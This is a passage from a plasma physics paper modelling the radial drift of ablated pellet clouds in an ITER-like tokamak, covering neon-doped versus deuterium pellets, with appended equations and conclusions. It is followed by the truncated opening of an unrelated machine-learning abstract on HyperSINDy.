If the plasmoid and background plasma properties do not depend on \(E_{y}\), equation (24) becomes a linear first-order ordinary differential equation in \(E_{y}\), which can be written in the form \[\frac{dE_{y}}{dt}+g(t)E_{y}=f(t), \tag{25}\] with \[g(t)=\frac{(1+\langle Z\rangle)B^{2}}{\bar{n}\langle m_{i}\rangle}\left(2P_{A }\frac{1}{R_{A}}+\frac{1}{R_{\text{eff}}}\right) \tag{26}\] and \[f(t)=\frac{4(1+\langle Z\rangle)B}{\langle m_{i}\rangle L_{\text{cld}}}\left( T-\frac{L_{\text{cld}}n_{\text{bg}}}{\bar{n}}T_{\text{bg}}\right)q\sin\left( \frac{L_{\text{cld}}}{2qR_{\text{m}}}\right) \tag{27}\] This equation can be solved by using an integrating factor \(e^{G(t)}\), so \[E_{y}=e^{-G(t)}\left(E_{y0}+\int_{0}^{t}e^{G(t)}f(t)dt\right), \tag{28}\] where \(E_{y0}=E_{y}(t=0)\) and \(G(t)=\int_{0}^{t}g(t)dt\). For a hot cloud, we have \[\begin{split} G(t)&=\frac{(1+\langle Z\rangle)B^{2}}{ \bar{n}\langle m_{i}\rangle}\left(2\left[1-\left(1-\frac{\Delta y}{\pi r} \right)^{N+1}\right]\frac{\pi r}{\Delta y}\frac{t_{0}}{R_{A}}+\frac{t}{R_{ \text{eff}}}\right)\\ &=2\left[1-\left(1-\frac{\Delta y}{\pi r}\right)^{N+1}\right] \frac{\pi r}{\Delta y}\frac{R_{\text{eff}}}{R_{A}}\frac{t_{0}}{t_{\text{acc} }}+\frac{t}{t_{\text{acc}}},\end{split} \tag{29}\] where we have defined \[t_{\text{acc}}=\frac{\bar{n}\langle m_{i}\rangle R_{\text{eff}}}{(1+\langle Z \rangle)B^{2}}. \tag{30}\] This is the characteristic acceleration time scale if the ohmic current dominates over the Alfven current; if \(R_{\text{eff}}/R_{A}\) is small (corresponding to a hot background plasma), or in the case of a cold cloud long after the ablation flow started to cross the local field line, the expression (29) reduces to \[G(t)=\frac{t}{t_{\rm acc}}. \tag{31}\] For a cold cloud shortly after the ablation flow started at the local field line, where \(P_{A}=1\), equation (29) reduces to the same expression but with \(R_{\rm eff}\) replaced with \(R_{A}\) in the expression for \(t_{\rm acc}\). Finally, as the radially outward drift velocity of the cloudlet is due to the \({\bf E}\times{\bf B}\) motion, it can be estimated as \(E_{y}/B\). Time integration leads to an expression for the net radial displacement \[\Delta r=\frac{1}{B}\int_{0}^{\infty}E_{y}{\rm d}t. \tag{32}\] ## 3 Parallel expansion and the final drift displacement In this section, we complete the description of the pellet cloud by defining the density source resulting from pellet ablation. We then evaluate the drift of the pellet cloud, demonstrating its dependence on pellet composition and background plasma temperature. ### Model for the line-integrated density and cloud expansion The line-integrated density can be determined based on an estimate of how many particles the cloud contains when it detaches from the pellet source. The latter can be obtained as the product of the ablation rate and the time during which the pellet source is ablating inside the cloud. A widely used estimate for the mass ablation rate is given by \[{\cal G}=\lambda(X)\left(\frac{T_{\rm keV}}{2}\right)^{5/3}\left(\frac{r_{p}} {r_{p0}}\right)^{4/3}n_{e20}^{1/3},\] where \(\lambda(X)=[27.1+\tan{(1.48X)}]/1000\) kg/s, \(T_{\rm keV}\) is the background electron temperature in keV, \(r_{p}\) is the pellet radius, \(r_{p0}=2\) mm and \(n_{e20}\) is the background electron density in units of \(10^{20}\) m\({}^{-3}\) (Parks 2017). 
This expression is based on a version of the Neutral Gas Shielding (NGS) model (Parks & Turnbull 1978) that allows the pellet material to have both hydrogenic and noble gas components. To determine the average detachment time (during which the pellet source contributes to the cloud), we estimate the initial acceleration \(\dot{v}_{0}=\dot{v}(t=0)=E_{y}(t=0)/B\) by balancing the first two terms in the current balance equation (24). The last two terms in (24) can be neglected, since in the initial phase, \(E_{y}\) is small. The time derivative of the electric field then becomes \[\frac{dE_{y}}{dt}=\frac{2B(1+\langle Z\rangle)}{\bar{n}\langle m_{i}\rangle R _{\rm m}}\left(\bar{n}T-L_{\rm cld}n_{\rm bg}T_{\rm bg}\right),\] so that the initial acceleration is \[\dot{v}_{0}=\frac{1}{B}\frac{dE_{y}}{dt}=\frac{2(1+\langle Z\rangle)}{\langle m _{i}\rangle R_{\rm m}}\left(T_{0}-\frac{n_{\rm bg}}{n_{0}}T_{\rm bg}\right), \tag{33}\] where \(n_{0}=\bar{n}/L_{\rm cld}\) is the initial cloud density and \(T_{0}\) is the initial temperature. Initially, the pellet cloud is neutral, and it expands radially, but as soon as the particles are ionized, the expansion will continue along the magnetic field lines. The initial parallel expansion takes place at the speed of sound at a temperature of approximately \(T_{0}\) (which is of the order of a few eV), and starts from a spherical cloud of cross section area \(\pi\Delta y^{2}\). We can therefore estimate the density from mass conservation according to \[\mathcal{G}=2n_{0}\langle m_{i}\rangle c_{s}(T_{0})\pi\Delta y^{2}\Rightarrow n_{ 0}=\frac{\mathcal{G}}{2\langle m_{i}\rangle c_{s}(T_{0})\pi\Delta y^{2}}. \tag{10}\] The average distance the ablated material must drift before it exits the initial expansion tube around the pellet is \(\Delta y\). Assuming that the initial motion has a constant acceleration we find \[\Delta y=v_{0}t_{\rm det}+\dot{v}_{0}t_{\rm det}^{2}/2,\] and the average detachment time thus becomes \[t_{\rm det}=-\frac{v_{0}}{\dot{v}_{0}}+\sqrt{\left(\frac{v_{0}}{\dot{v}_{0}} \right)^{2}+\frac{2\Delta y}{\dot{v}_{0}}}, \tag{11}\] where \(v_{0}=v_{p}\) is the initial cloud velocity relative to the pellet, which is equal in magnitude but opposite in sign to the pellet velocity (assuming the cloud would be frozen in to the field lines where it was ablated in the absence of the \(E\times B\) acceleration). During the detachment time \(t_{\rm det}\) the cloud expands to a length \[L_{c}=2c_{s}(T_{0})t_{\rm det}, \tag{12}\] which serves as an initial condition for the cloud length for the remainder of the drift motion. The line-integrated density is thus \[\bar{n}=\frac{\mathcal{G}t_{\rm det}}{\langle m_{i}\rangle\pi\Delta y^{2}}. \tag{13}\] When the cloud detaches from the pellet, the temperature initially rises quickly due to the heating from hot electrons in the background plasma, but the details depend on the density and composition of the cloud. At low densities, the mean free path of the background-plasma electrons in the cloud is longer than the cloud itself. These electrons thus pass through the cloud and heat it relatively uniformly (Aleynikov et al., 2019; Runov et al., 2021; Arnold et al., 2021). Most of the literature, however, considers the opposite limit of a dense cloud, where the stopping power is so great that the hot electrons cannot easily pass through it. We only consider this case but note that it becomes inapplicable at low cloud densities and high background-plasma temperatures. 
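As a rough numerical illustration of the quantities introduced above, the sketch below (Python/NumPy) chains together the ablation rate \(\mathcal{G}\), the initial cloud density \(n_{0}\), the initial acceleration \(\dot{v}_{0}\), the detachment time \(t_{\rm det}\), the initial cloud length \(L_{c}\) and the line-integrated density \(\bar{n}\). The input values are illustrative placeholders rather than the scenario parameters used later in the text; the composition argument \(X\) of Parks' \(\lambda(X)\) is simply passed through without restating its definition; temperatures are converted from eV to SI energy units; and the sound speed uses the expression quoted later in the text.

```python
import numpy as np

# Illustrative evaluation of the cloud "initial conditions"; all inputs are placeholders.
e_charge = 1.602176634e-19     # J per eV
m_p      = 1.67262192e-27      # proton mass [kg]

def ablation_rate(T_keV, r_p, n_e20, X, r_p0=2e-3):
    """Mass ablation rate G [kg/s] from the Parks-type formula quoted above."""
    lam = (27.1 + np.tan(1.48 * X)) / 1000.0
    return lam * (T_keV / 2.0) ** (5.0 / 3.0) * (r_p / r_p0) ** (4.0 / 3.0) * n_e20 ** (1.0 / 3.0)

def sound_speed(T_eV, m_i, Z, gamma_e=1.0, gamma_i=3.0):
    return np.sqrt((gamma_e * Z + gamma_i) * T_eV * e_charge / m_i)

# Placeholder inputs: deuterium shard in a hot background plasma
T_bg_eV, n_bg = 5.0e3, 1.0e20      # background temperature [eV] and density [m^-3]
T0_eV         = 2.0                # initial cloud temperature [eV]
m_i, Z        = 2.0 * m_p, 1.0     # deuterium
R_m, dy       = 5.0, 1.25e-2       # major radius [m], cloud half-width [m]
r_p, v_p, X   = 2.0e-3, 500.0, 0.0 # shard radius [m], pellet speed [m/s], composition parameter

G     = ablation_rate(T_bg_eV / 1.0e3, r_p, n_bg / 1.0e20, X)
cs0   = sound_speed(T0_eV, m_i, Z)
n0    = G / (2.0 * m_i * cs0 * np.pi * dy**2)                       # mass conservation
vdot0 = 2.0 * (1.0 + Z) / (m_i * R_m) * (T0_eV - n_bg / n0 * T_bg_eV) * e_charge
t_det = -v_p / vdot0 + np.sqrt((v_p / vdot0) ** 2 + 2.0 * dy / vdot0)
L_c   = 2.0 * cs0 * t_det
nbar  = G * t_det / (m_i * np.pi * dy**2)

print(f"G = {G:.3e} kg/s, n0 = {n0:.3e} m^-3, vdot0 = {vdot0:.3e} m/s^2")
print(f"t_det = {t_det:.3e} s, L_c = {L_c:.3f} m, nbar = {nbar:.3e} m^-2")
```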
The heating also depends on the pellet composition; if the pellet contains even a small amount of a high-Z radiative component, the radiation from the pellet cloud quickly reaches a balance with the heating from the background plasma, and therefore the temperature rises far more slowly (Matsuyama, 2022). For pure hydrogen pellets, on the other hand, the radiation is too weak to have a major impact on the energy balance, and then the cloud temperature will relatively quickly increase to several tens of eV. The dependence of the cloud temperature on the background plasma temperature will be rather weak, as a higher background plasma temperature means both an increased heating and an increased ablation rate, giving more particles to absorb and, in the case of a high-Z-doped pellet, radiate away the energy. The heat flux scales as \(q_{\rm bg}\sim T_{\rm bg}^{3/2}\) (neglecting any scaling of the cloud cross section area with the temperature), and the ablation rate scales as \(\mathcal{G}\sim T_{\rm bg}^{5/3}\), so that the cloud temperature scales as \(T\sim q_{\rm bg}/\mathcal{G}\sim T_{\rm bg}^{-1/6}\), i.e. a very weak scaling. Typical values for the cloud temperature, based on the results presented in Matsuyama (2022), are \(T=5\,\)eV for neon doped pellets and \(T=30\,\)eV for pure hydrogen pellets. In the following we will assume the cloud temperature is constant during the drift motion and is independent of the background plasma temperature. This approximation is, of course, quite crude but not more so than other simplifications we have employed. Finally, as long as the cloud pressure is much higher than the background plasma pressure, the cloud will expand by approximately the speed of sound inside the cloud, \(c_{s}\approx\sqrt{(\gamma_{e}\langle z\rangle+\gamma_{i})T/\langle m_{i}\rangle}\), with \(\gamma_{e}=1\) and \(\gamma_{i}=3\), and will slow down when the cloud pressure becomes comparable to the background plasma pressure. Here we assume that the expansion speed is equal to \(c_{s}\) as long as the cloud pressure is higher than the background plasma pressure, and then stops immediately when the cloud pressure becomes equal to the background plasma pressure, i.e. \[L_{\rm cld}\approx L_{c}+2c_{s}{\rm min}(t,t_{\rm pe}), \tag{12}\] where the pressure equilibration time is \[t_{\rm pe}=\frac{T\bar{n}}{2c_{s}n_{\rm bg}T_{\rm bg}}. \tag{13}\] With the parallel dynamics model presented here, we have all the details needed to evaluate the electric field inside the cloud, and the drift displacement can be calculated by evaluating the integral in (32). Analytical expressions for the drift displacement in various limits are given in Appendix A. ### Calculation of the drift distance in an ITER-like scenario We now evaluate the above expressions for the drift displacement for parameters of interest in an ITER-like scenario, similar to that studied by Matsuyama (2022). In this scenario, the drifting pellet cloud is ablated from a pellet shard with radius \(r_{\rm p}=2\,{\rm mm}\) located at major radius \(R_{\rm m}=5\,{\rm m}\) and travelling with a speed of \(v_{0}=500\,{\rm m/s}\) towards the high field side (i.e. the injection is from the low-field side). We also assume that the cloud is initially stationary in the lab frame, so that \(E_{y0}=0\). The background plasma has a free electron density of \(n_{\rm bg}=10^{20}\,{\rm m}^{-3}\) and the magnetic field strength is \(B=5\,{\rm T}\). 
Moreover, we set \(q=1\), \(\Delta y=1.25\,{\rm cm}\) (based on simulation results by Matsuyama (2022)), and the average charge for the neon is approximately \(\langle Z_{\rm Ne}\rangle\approx 2\) at 5 eV. The background plasma temperature \(T_{\rm bg}\) and the pellet composition will be varied. Matsuyama (2022) uses a model similar to that used by Pegourie (2007), adapted to mixed neon-deuterium pellets, including a Neutral Gas and Plasma Shielding (NGPS) model for the pellet ablation and a volume-averaged single-cell Lagrangian model for the parallel expansion. However, Matsuyama (2022) only considers the early stages of the drift motion during the first \(130\,\mu{\rm s}\) after the cloud has detached from the pellet, for a single isolated cloud, and therefore does not include the effect of ohmic currents and rotational transform. Thus, the model by Matsuyama (2022) accounts for the same physical mechanisms concerning the drift motion as ours in the case of a cold cloud shortly after the ablation flow has started to cross the local field lines\({}^{1}\). He concluded that the drift displacement is likely to be substantial compared to the plasma minor radius for pure hydrogen pellets, but will be strongly reduced in the presence of even a small amount of neon. Here, we attempt to reproduce this result in the corresponding limit, and then extend it by calculating the drift displacement after a long time, including the effect of ohmic currents. Figure 3 shows the drift displacement for cold clouds (30 eV for pure hydrogen, 5 eV otherwise). This is calculated by integrating (A.2) (leading to (A.3) if we integrate up to infinity), as a function of the background plasma temperature and pellet composition, with different integration times and assumptions regarding the ohmic currents. In panel a) we consider the case when the ablation flow has just started to cross the local field lines, i.e. with the parallel current consisting only of the Alfven current, and panel b) shows the results for long after the ablation flow started to cross the local field lines, i.e. with the parallel current being purely ohmic. The dashed lines in panel a) are calculated with the assumption that the parallel current is purely Alfvenic, as was assumed by Matsuyama (2022), and the results are similar to those shown in figure 11 in Matsuyama (2022) within an order unity factor, especially at high background plasma temperatures. The variation with both the background temperature and pellet composition agrees reasonably well. We see, however, that when we extend the integration time to infinity (solid lines), the drift displacement increases significantly at high background plasma temperatures, so that even clouds with 100% neon would drift several meters in the absence of ohmic currents, although the drift displacement is not strongly affected for temperatures \(\lesssim 1\) keV. This can be understood by considering that the pressure equilibration time becomes longer at high background plasma temperatures (see the expression for \(t_{\rm pe}\) above), so that the cloud can drift a significant distance after the first \(130\,\mu\)s. Moreover, in the absence of ohmic currents, the acceleration time scale is typically longer than \(130\,\mu\)s, so that the cloud continues to gain speed even after this time frame. For low background plasma temperatures, on the other hand, the pressure equilibration time becomes shorter than \(130\,\mu\)s so the cloud does not drift significantly after this time.
Figure 3: Drift displacement as a function of background plasma temperature and pellet composition for cold clouds (30 eV for pure hydrogen, 5 eV otherwise), with different integration times and assumptions for the parallel current. In panel a) the parallel current is assumed to be purely Alfvenic (corresponding to when the ablation flow has just started to cross the local field lines), and in panel b) the parallel current is assumed to be purely ohmic (corresponding to long after the ablation flow started to cross the local field lines). The solid lines correspond to performing the time integral of the drift velocity to \(t=\infty\), as in (32); the dashed lines are obtained by integrating only to \(130\,\mu\)s. In panel b), where the parallel current is purely ohmic, we see that the drift displacement is reduced by about one order of magnitude when integrating up to \(130\,\mu\)s (compare with panel a), and about two orders of magnitude when integrating to infinity. The scaling with the background plasma temperature is also weaker, as anticipated above, because the resistivity determining the parallel current now scales with the background plasma temperature as \(R_{\rm eff}\sim T_{\rm bg}^{-3/2}\), which mostly cancels the temperature scaling of the ablation rate \(\mathcal{G}\sim T_{\rm bg}^{5/3}\) (there is some dependence on the background temperature left at lower background temperatures where the ratio of the cloud pressure and the background pressure is lower). Moreover, the effect of increasing the integration time beyond \(130\,\mu\)s is now much smaller than in the absence of ohmic currents. This follows as the acceleration time scale \(t_{\rm acc}\) is much shorter, so that the cloud decelerates rather than accelerates after the first \(130\,\mu\)s. For neon-doped pellets, the drift displacement now ranges from a few cm up to \(\sim 20\) cm at the highest relevant temperatures, which is small compared to both the plasma minor radius and the plume of shards in case of a shattered pellet injection (SPI) in an ITER-like scenario. The pure deuterium pellets, on the other hand, still have a drift displacement of tens of cm, which is a sizeable fraction of the plasma minor radius and comparable to the radial extent of the shard plume in case of an SPI. This result corroborates the conclusion made by Matsuyama (2022). We now compare the results for the same plasma scenario as above using the expressions obtained with different limits and model assumptions. As we have seen in section 2.1.1, for hot clouds (e.g. pure deuterium pellets), the \(N\to\infty\) limit of \(R_{\rm eff}\) can be used while we keep \(N\) finite in the expression of \(P_{A}\). For cold clouds (e.g. neon-doped pellets), in the long-time limit (as the potential reaches its quasi-stationary value), the Alfven part of the current can be neglected (\(P_{A}=0\)). In figure 4, the full solution, which contains both the \(I_{\parallel,\rm A}\) and \(I_{\parallel,\rm ohm}\) contributions obtained by numerically integrating (A.1), is shown by a black curve for a pure deuterium pellet (panel a) and a 2% neon-doped one (panel b). We also consider the cases representing the long and short-time limits, in terms of the time passed after the ablation flow first started to cross the local field lines. In the short-time limit (green long-dashed curve) \(I_{\parallel,\rm ohm}\) is neglected, and it is calculated by replacing \(R_{\rm eff}\) by \(R_{A}\) in equation (A.3).
The long-time limit (blue dashed curve) physically means that \(I_{\parallel,\rm A}\) is neglected, and it is calculated using (A.3). (Note that in the case of a cold cloud with a fast magnetic field diffusion time scale compared to the drift motion, in the long-time limit, the \(I_{\parallel,\rm A}=0\) limit is expected to be accurate, as discussed at the end of Sec. 2.1.1.) In addition, we also show results calculated using the simplified expression (A.5) (red dash-dotted), which represents the high-background-temperature asymptotic behaviour of the long-time limit. We see that for both the pure deuterium and the neon-doped pellet (figures 4a and b), the long-time limit gives similar drift displacement to the general expression (compare dashed and solid), especially at high background-plasma temperatures. Figure 4: Comparison of the drift displacement obtained with different limits and model assumptions, for a pellet consisting of a) 100% deuterium and b) a mixture with 98% neon and 2% deuterium. Solid black: \(I_{\parallel,\rm A}+I_{\parallel,\rm ohm}\), numerical integration of (A.1). Dashed blue: \(I_{\parallel,\rm A}=0\), using (A.3). Dash-dotted red: \(I_{\parallel,\rm A}=0\) and taking the \(T_{\rm bg}\to\infty\) asymptotic behaviour, using (A.5). Long dashed green: \(I_{\parallel,\rm ohm}=0\), using (A.3), but with \(R_{\rm eff}\) replaced by \(R_{\rm A}\). There is a discrepancy of \(\lesssim 50\%\) at background temperatures of \(T_{\rm bg}\sim 100\,\)eV where the ohmic conductivity is rather low, but at these temperatures the displacement, and therefore the discrepancy, remains moderate. The overall good agreement reflects that the number of connections \(N\) continuously increases with time in a hot cloud, so that the Alfven conductivity is replaced by ohmic conductivity over a short period of time compared to the total drift time. In the case of a pure deuterium pellet (figure 4a), we see that the high-background-temperature asymptotic form of the long-time limit (dash-dotted) approaches the more accurate expression (A.3) at \(T_{\rm bg}\gtrsim 1\,\)keV, but the approach is much slower in the doped-pellet case (figure 4b). This difference is due to the higher cloud temperature for a pure deuterium cloud, leading to a longer pressure equilibration time \(t_{\rm pe}\) while the acceleration time \(t_{\rm acc}\) remains only weakly affected by the background temperature, making the approximation \(t_{\rm acc}/t_{\rm pe}\approx 0\) accurate at lower temperatures. Finally, we find that the short-time limit (long-dashed curves in figure 4) typically gives unphysically large drift displacements, unlike the general expression and the long-time limit. Only at \(T_{\rm bg}\lesssim 100\,\)eV does the short-time-limit expression become comparable to or smaller than the long-time limit; then the ohmic conductivity of the background plasma becomes so low that the Alfven conductivity starts to dominate. We note that at sufficiently low values of \(T_{\rm bg}\), the short-time limit result starts to asymptotically approach the general expression (black curve), but that happens at very small, inconsequential, values of the drift displacement \(\Delta r\). ## 4 Discussion and Conclusion We have derived a semi-analytical model for the cross-field drift of an ionised cloud following a pellet injection in a tokamak. The model gives the radial drift velocity in terms of the background plasma and cloud properties, assuming the latter to be constant along the field lines inside the cloud.
The main phenomena included in the model are the \(\nabla B\) current causing the charge separation inside the cloud and the resulting \(E\times B\) drift, the rotational transform, pressure equilibration, and the currents limiting the charge separation; the latter including the polarisation current and the currents exiting through the ends of the cloud parallel to the field lines, consisting of an Alfvenic and an ohmic contribution. In particular, we have developed a statistical model for the length of the field lines connecting the two ends of the cloud, and the corresponding effective resistivity for the ohmic current flowing along those field lines. We then derive semi-analytical expressions for the final drift displacement, combining our model for the cross-field drift with a simple analytical model for the cloud properties. We evaluate the resulting expressions in an ITER-like scenario similar to those studied by Matsuyama (2022), including a wide range of background plasma temperatures and different neon-deuterium mixtures for the pellet composition. Our results are in reasonable agreement with those obtained by Matsuyama (2022) in the corresponding limit, integrating only up to \(130\,\mu\)s after the cloud is detached from the pellet source and neglecting the ohmic part of the parallel current (corresponding to a cold cloud shortly after the pellet material has started to flow across a given field line). We then investigate the effect of adding the ohmic part of the parallel current and integrating to longer times. Without ohmic currents, the final drift displacement becomes unreasonably long, up to several tens (or even hundreds) of meters, while adding the ohmic current reduces the drift displacement by typically 1-2 orders of magnitude. Our results suggest that a pure deuterium pellet injection in an ITER-like scenario is likely to be significantly affected by the radial drift displacement, and that a substantial part of the injected material may be expelled from the plasma. On the other hand, a neon-doped pellet injection will likely be significantly less affected by the drift displacement. This result corroborates the conclusion made by Matsuyama (2022). Note, however, that even a relatively small drift displacement can have a significant effect on the ablation and density profile (Vallhagen, 2021). The reason is that even a small drift means that the pellet will not feel its own cooling effect on the background plasma, which otherwise provides a self-regulating feedback mechanism that decreases the ablation rate. Even a small drift therefore makes the pellet, or pellet shards, ablate faster, so that they deposit more of their material earlier along their trajectories. This applies especially to injections from the low field side, as in that case the drift will displace the ablated material behind the ablating source. On the other hand, an injection from the high field side will displace the ablated material in front of the pellet or pellet shard, so that it feels the effect of its own cooling along its trajectory. In the case of an SPI in an ITER-like scenario, the plume of shards typically extends over several decimetres. Thus, in the case of a neon-doped pellet, our results indicate that the shards will still feel the cooling of the background plasma from most shards ahead of them, even for an injection from the low field side.
For a pure deuterium SPI, on the other hand, the drift displacement will likely be longer than the extent of the plume of shards, which might increase the ablation significantly, especially for an injection from the low field side. A quantitative assessment of the effect of the drift displacements calculated by the model presented here would require coupling to a model for the full injection dynamics and response of the background plasma, which is outside the scope of the present work. The accuracy of the results presented in this paper is also limited by a number of simplifications, primarily in the model for the parallel expansion and cloud properties. In particular, the cloud properties are assumed to be constant along the field lines inside the cloud, and the energy balance and temperature evolution are modelled using only a constant, representative value for the cloud temperature. While the cloud temperature remains rather low and constant for a neon-doped pellet due to the high radiated power, the temperature will vary significantly during the drift motion for a pure deuterium pellet; indeed, the discrepancy compared to the results obtained by Matsuyama (2022) is larger for a pure deuterium pellet. The quantitative accuracy of the present model could therefore be significantly improved by combining the present model for the cross-field drift with a more advanced model for the cloud properties, which is outside the scope of the present work. ## Appendix A Expression for the drift displacement in relevant limits It is convenient to introduce the expansion time scale \(t_{\rm exp}=L_{c}/(2c_{s})\) and the time \(t_{\rm pol}\) it takes the cloud to expand over a poloidal angle of one radian. We also introduce the normalised time variable \(t^{\prime}=t/t_{\rm acc}\) and normalise the other time scales accordingly, also denoted with a prime, and introduce the shifted normalised time variable \(t^{\prime\prime}=t^{\prime}+t_{\rm exp}/t_{\rm acc}\). In terms of these variables, the electric field inside the cloud can be expressed as \[\begin{split} E_{y}&=E_{y0}e^{-G(t^{\prime})}+\frac{2(1+\langle Z\rangle)BTq}{\langle m_{i}\rangle c_{s}}e^{-G(t^{\prime})}\int_{0}^{\min(t^{\prime},t^{\prime}_{\rm pe})}e^{G(\tilde{t}^{\prime})}\left(\frac{1}{\tilde{t}^{\prime\prime}}-\frac{1}{t^{\prime}_{\rm pe}}\right)\sin\left(\frac{\tilde{t}^{\prime\prime}}{t^{\prime}_{\rm pol}}\right)d\tilde{t}^{\prime}\\ &=E_{y0}e^{-G(t^{\prime})}+\frac{2(1+\langle Z\rangle)BTq}{\langle m_{i}\rangle c_{s}}\mathcal{E}\left(t^{\prime}_{\rm pe},t^{\prime}_{\rm exp},t^{\prime}_{\rm pol},\frac{R_{\rm eff}}{R_{A}},t^{\prime}\right),\end{split} \tag{A.1}\] where \(\tilde{t}^{\prime\prime}=\tilde{t}^{\prime}+t_{\rm exp}/t_{\rm acc}\) and \(\mathcal{E}\) is a dimensionless function of the time variable \(t^{\prime}\) with four dimensionless parameters. However, not all four parameters are relevant in all cases. If, for instance, the ohmic currents dominate over the Alfven current (such as for a hot background plasma or for a cold cloud long after the ablation flow started to cross the local field line), we can set \(R_{\rm eff}/R_{A}=0\).
In this case, \(\mathcal{E}\) can be expressed in closed form as \[\begin{split}\mathcal{E}\left(t^{\prime}_{\rm pe},t^{\prime}_{\rm exp},t^{\prime}_{\rm pol},0,t^{\prime}\right)&=e^{-t^{\prime}}\left\{e^{-t^{\prime}_{\rm exp}}\mathfrak{Ei}\left[\left(1+\frac{i}{t^{\prime}_{\rm pol}}\right)t^{\prime\prime}\right]-\frac{1}{t^{\prime}_{\rm pe}}e^{t^{\prime}}\frac{\sin\left(\frac{t^{\prime\prime}}{t^{\prime}_{\rm pol}}\right)-\frac{1}{t^{\prime}_{\rm pol}}\cos\left(\frac{t^{\prime\prime}}{t^{\prime}_{\rm pol}}\right)}{1+{t^{\prime}_{\rm pol}}^{-2}}\right\}_{0}^{\min(t^{\prime},t^{\prime}_{\rm pe})}\\ &=e^{-t^{\prime}}\left(\epsilon\left(t^{\prime}_{\rm pe},t^{\prime}_{\rm exp},t^{\prime}_{\rm pol},\min(t^{\prime},t^{\prime}_{\rm pe})\right)-\epsilon\left(t^{\prime}_{\rm pe},t^{\prime}_{\rm exp},t^{\prime}_{\rm pol},0\right)\right),\end{split} \tag{A.2}\] with \[\mathfrak{Ei}[x]=\frac{1}{2i}\left[\mathrm{Ei}(x)-\mathrm{Ei}(x^{*})\right],\] where \(\mathrm{Ei}\) is the exponential integral function, \(i\) is the imaginary unit, an asterisk superscript denotes complex conjugate, and we defined the expression within the curly bracket in equation (A.2) as \(\epsilon\). Integrating equation (A.2), we get the following expression for the drift displacement: \[\begin{split}\Delta r&=\frac{E_{y0}}{B}t_{\rm acc}+\frac{2(1+\langle Z\rangle)Tq}{\langle m_{i}\rangle c_{s}}t_{\rm acc}\int_{0}^{\infty}\mathcal{E}\left(t^{\prime}_{\rm pe},t^{\prime}_{\rm exp},t^{\prime}_{\rm pol},0,t^{\prime}\right)dt^{\prime}\\ &=v_{0}t_{\rm acc}+\frac{4\bar{n}TR_{\rm eff}q}{B^{2}c_{s}}\Big\{\epsilon\left(t^{\prime}_{\rm pe},t^{\prime}_{\rm exp},t^{\prime}_{\rm pol},t^{\prime}_{\rm pe}\right)e^{-t^{\prime}_{\rm pe}}-\epsilon\left(t^{\prime}_{\rm pe},t^{\prime}_{\rm exp},t^{\prime}_{\rm pol},0\right)\\ &\quad+e^{-t^{\prime}_{\rm exp}}\left[e^{-t^{\prime}}\left\{e^{t^{\prime\prime}}\mathfrak{Ei}\left[i\frac{t^{\prime\prime}}{t^{\prime}_{\rm pol}}\right]-\mathfrak{Ei}\left[\left(1+i\frac{1}{t^{\prime}_{\rm pol}}\right)t^{\prime\prime}\right]\right\}\right]_{0}^{t^{\prime}_{\rm pe}}\\ &\quad+\frac{1}{t^{\prime}_{\rm pe}}\frac{1}{1+{t^{\prime}_{\rm pol}}^{-2}}\left[t^{\prime}_{\rm pol}\cos\left(\frac{t^{\prime\prime}}{t^{\prime}_{\rm pol}}\right)+\sin\left(\frac{t^{\prime\prime}}{t^{\prime}_{\rm pol}}\right)\right]_{0}^{t^{\prime}_{\rm pe}}\Big\},\end{split} \tag{A.3}\] where \(v_{0}=E_{y0}/B\) is the speed of the pellet. In some relevant cases, \(\mathcal{E}\) can be simplified further; for high background temperatures, \(t_{\rm acc}/t_{\rm pe}\approx 0\). Moreover, the cloud length typically becomes much longer than the initial length \(L_{c}\) in a very short amount of time, so that we can approximate \(L_{c}/(c_{s}t_{\rm acc})\approx 0\).
In that case, \(\mathcal{E}\) only depends on a single parameter \(t_{\rm pol}/t_{\rm acc}\), and can be expressed as \[\begin{split}\mathcal{E}\left(\infty,0,t^{\prime}_{\rm pol},0,t^{\prime}\right)&=e^{-t^{\prime}}\left\{\mathfrak{Ei}\left[\left(1+i\frac{1}{t^{\prime}_{\rm pol}}\right)t^{\prime}\right]\right\}_{0}^{t^{\prime}}\\ &=e^{-t^{\prime}}\left\{\mathfrak{Ei}\left[\left(1+i\frac{1}{t^{\prime}_{\rm pol}}\right)t^{\prime}\right]-\tan^{-1}\frac{1}{t^{\prime}_{\rm pol}}\right\}.\end{split} \tag{A.4}\] The corresponding expression for the drift displacement becomes \[\begin{split}\Delta r&=\frac{E_{y0}}{B}t_{\rm acc}+\frac{2(1+\langle Z\rangle)Tq}{\langle m_{i}\rangle c_{s}}t_{\rm acc}\int_{0}^{\infty}\mathcal{E}\left(\infty,0,t^{\prime}_{\rm pol},0,t^{\prime}\right)dt^{\prime}\\ &=v_{0}t_{\rm acc}+\frac{\pi\bar{n}TR_{\rm eff}q}{B^{2}c_{s}}.\end{split} \tag{A.5}\] Equations (A.4)-(A.5) apply also to a cold cloud shortly after the ablation flow has started to cross the local field line, but with \(R_{\rm eff}\) replaced with \(R_{A}\), in accordance with the corresponding change in the expression for \(t_{\rm acc}\), equation (30). Note that an increased acceleration time-scale leads to a longer drift displacement, which might seem surprising as that means that it takes longer for the cloud to get up to speed. This is however compensated by the increased inertia, preventing the cloud from slowing down when the acceleration changes sign due to the sign change of the net \(\nabla B\) current, when the sine factor in equation (24) becomes negative. ## Acknowledgements The authors are grateful to E Nardon and A Matsuyama for fruitful discussions. This work was supported by the Swedish Research Council (Dnr. 2018-03911) and part-funded by the EPSRC Energy Programme [grant number EP/W006839/1]. The work has been carried out within the framework of the EUROfusion Consortium, funded by the European Union via the Euratom Research and Training Programme (Grant Agreement No 101052200 -- EUROfusion). Views and opinions expressed are however those of the author(s) only and do not necessarily reflect those of the European Union or the European Commission. Neither the European Union nor the European Commission can be held responsible for them.
2310.04832
HyperSINDy: Deep Generative Modeling of Nonlinear Stochastic Governing Equations
The discovery of governing differential equations from data is an open frontier in machine learning. The sparse identification of nonlinear dynamics (SINDy) \citep{brunton_discovering_2016} framework enables data-driven discovery of interpretable models in the form of sparse, deterministic governing laws. Recent works have sought to adapt this approach to the stochastic setting, though these adaptations are severely hampered by the curse of dimensionality. On the other hand, Bayesian-inspired deep learning methods have achieved widespread success in high-dimensional probabilistic modeling via computationally efficient approximate inference techniques, suggesting the use of these techniques for efficient stochastic equation discovery. Here, we introduce HyperSINDy, a framework for modeling stochastic dynamics via a deep generative model of sparse governing equations whose parametric form is discovered from data. HyperSINDy employs a variational encoder to approximate the distribution of observed states and derivatives. A hypernetwork \citep{ha_hypernetworks_2016} transforms samples from this distribution into 